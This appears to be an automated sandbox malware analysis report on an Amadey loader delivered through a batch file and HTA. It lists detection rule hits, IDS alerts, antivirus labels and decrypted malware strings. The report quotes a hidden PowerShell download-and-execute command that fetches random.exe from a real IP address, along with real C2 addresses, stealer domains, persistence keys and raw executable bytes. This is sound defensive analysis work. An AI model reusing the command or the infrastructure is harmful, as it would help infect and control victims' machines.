                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7056, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 7072, ProcessName: powershell.exe
                      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7056, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 7072, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4028, ProcessName: svchost.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Powershell download and execute file
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\mtzRdqIHD.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6736, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 4764, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T19:50:50.758714+010020283713Unknown Traffic192.168.2.849806188.114.96.3443TCP
                      2025-03-07T19:52:22.897285+010020283713Unknown Traffic192.168.2.849695104.21.32.1443TCP
                      2025-03-07T19:52:25.891206+010020283713Unknown Traffic192.168.2.849698104.21.32.1443TCP
                      2025-03-07T19:52:28.849483+010020283713Unknown Traffic192.168.2.849700104.21.32.1443TCP
                      2025-03-07T19:52:31.986631+010020283713Unknown Traffic192.168.2.849702104.21.32.1443TCP
                      2025-03-07T19:52:36.688511+010020283713Unknown Traffic192.168.2.849704104.21.32.1443TCP
                      2025-03-07T19:52:37.265032+010020283713Unknown Traffic192.168.2.849706104.21.32.1443TCP
                      2025-03-07T19:52:40.129030+010020283713Unknown Traffic192.168.2.849708104.21.32.1443TCP
                      2025-03-07T19:52:44.380467+010020283713Unknown Traffic192.168.2.849726104.21.32.1443TCP
                      2025-03-07T19:53:02.941629+010020283713Unknown Traffic192.168.2.849779188.114.96.3443TCP
                      2025-03-07T19:53:05.971117+010020283713Unknown Traffic192.168.2.849793188.114.96.3443TCP
                      2025-03-07T19:53:08.971652+010020283713Unknown Traffic192.168.2.849804188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T19:52:05.921914+010028561471A Network Trojan was detected192.168.2.849690176.113.115.680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T19:52:10.722253+010028033053Unknown Traffic192.168.2.849692176.113.115.780TCP
                      2025-03-07T19:52:16.890841+010028033053Unknown Traffic192.168.2.849694176.113.115.780TCP
                      2025-03-07T19:52:25.032460+010028033053Unknown Traffic192.168.2.849699176.113.115.780TCP
                      2025-03-07T19:52:31.901713+010028033053Unknown Traffic192.168.2.849703176.113.115.780TCP
                      2025-03-07T19:52:38.130912+010028033053Unknown Traffic192.168.2.849707176.113.115.780TCP
                      2025-03-07T19:52:46.313749+010028033053Unknown Traffic192.168.2.849730176.113.115.780TCP
                      2025-03-07T19:52:52.652974+010028033053Unknown Traffic192.168.2.849745176.113.115.780TCP
                      2025-03-07T19:52:57.980435+010028033053Unknown Traffic192.168.2.849750176.113.115.780TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: https://defaulemot.run/jUSiazAaAvira URL Cloud: Label: malware
                      Source: https://defaulemot.run/jUSiaz$IAvira URL Cloud: Label: malware
                      Source: https://defaulemot.run:443/jUSiaz?Avira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\10128600101\60eb3ded99.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeAvira: detection malicious, Label: TR/AD.PSLoader.wdbmn
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Users\user\AppData\Local\Temp\D51OAO8D0TVNMCQXHC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/AD.PSLoader.wdbmn
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Found malware configuration
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                      Multi AV Scanner detection for submitted file
                      Source: am_no.batVirustotal: Detection: 23%Perma Link
                      Source: am_no.batReversingLabs: Detection: 13%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Sample uses string decryption to hide its real strings
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 176.113.115.6
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Ni9kiput/index.php
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: S-%lu-
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: bb556cff4a
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapes.exe
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Startup
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cmd /C RMDIR /s/q
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Programs
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: %USERPROFILE%
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll|clip.dll|
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: clip.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: http://
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: https://
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: /quiet
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Plugins/
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: &unit=
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: shell32.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: kernel32.dll
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: GetNativeSystemInfo
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProgramData\
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: AVAST Software
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Kaspersky Lab
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Panda Security
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Doctor Web
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 360TotalSecurity
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Bitdefender
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Norton
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Sophos
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Comodo
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: WinDefender
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0123456789
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ------
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ?scr=1
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ComputerName
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: -unicode-
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: VideoID
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.XResolution
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.YResolution
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProductName
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: CurrentBuild
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32.exe
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: "taskkill /f /im "
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: && Exit"
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && ren
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Powershell.exe
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: random
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Keyboard Layout\Preload
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000419
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000422
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000423
                      Source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0000043f
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: defaulemot.run/jUSiaz
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: begindecafer.world/QwdZdf
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: garagedrootz.top/oPsoJAN
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: modelshiverd.icu/bJhnsj
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: arisechairedd.shop/JnsHY
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: catterjur.run/boSnzhu
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: orangemyther.live/IozZ
                      Source: 35.2.19be97887a.exe.e20000.0.unpackString decryptor: fostinjec.today/LksNAz

                      Phishing

                      barindex
                      Yara detected Healer AV Disabler
                      Source: Yara matchFile source: Process Memory Space: ab5415a7b5.exe PID: 5236, type: MEMORYSTR
                      Yara detected obfuscated html page
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta, type: DROPPED
                      Source: Yara matchFile source: C:\Temp\mtzRdqIHD.hta, type: DROPPED
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49695 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49698 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49791 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49792 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49804 version: TLS 1.2
                      Source: Binary string: lib.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bpdbtem.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: re.pdb; source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: lib.pdb6 source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: ab5415a7b5.exe, 00000035.00000003.1955416141.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, ab5415a7b5.exe, 00000035.00000002.2093414321.0000000000D12000.00000040.00000001.01000000.00000017.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA9BF4 FindFirstFileExW,29_2_00007FF7C9CA9BF4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,34_2_0096DBBE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093C2A2 FindFirstFileExW,34_2_0093C2A2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009768EE FindFirstFileW,FindClose,34_2_009768EE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,34_2_0097698F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,34_2_0096D076
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,34_2_0096D3A9
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00979642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,34_2_00979642
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,34_2_0097979D
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00979B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,34_2_00979B2B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00975C97 FindFirstFileW,FindNextFileW,FindClose,34_2_00975C97
                      Source: firefox.exeMemory has grown: Private usage: 1MB later: 44MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49690 -> 176.113.115.6:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 176.113.115.6
                      Source: unknownNetwork traffic detected: DNS query count 34
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:51:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:49:06 GMTETag: "1d2e00-62fc43d2837d2"Accept-Ranges: bytesContent-Length: 1912320Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 30 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4c 00 00 04 00 00 59 ca 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 15 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 15 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 6e 6e 71 73 68 63 00 20 1a 00 00 00 32 00 00 1a 1a 00 00 ee 02 00 00 00 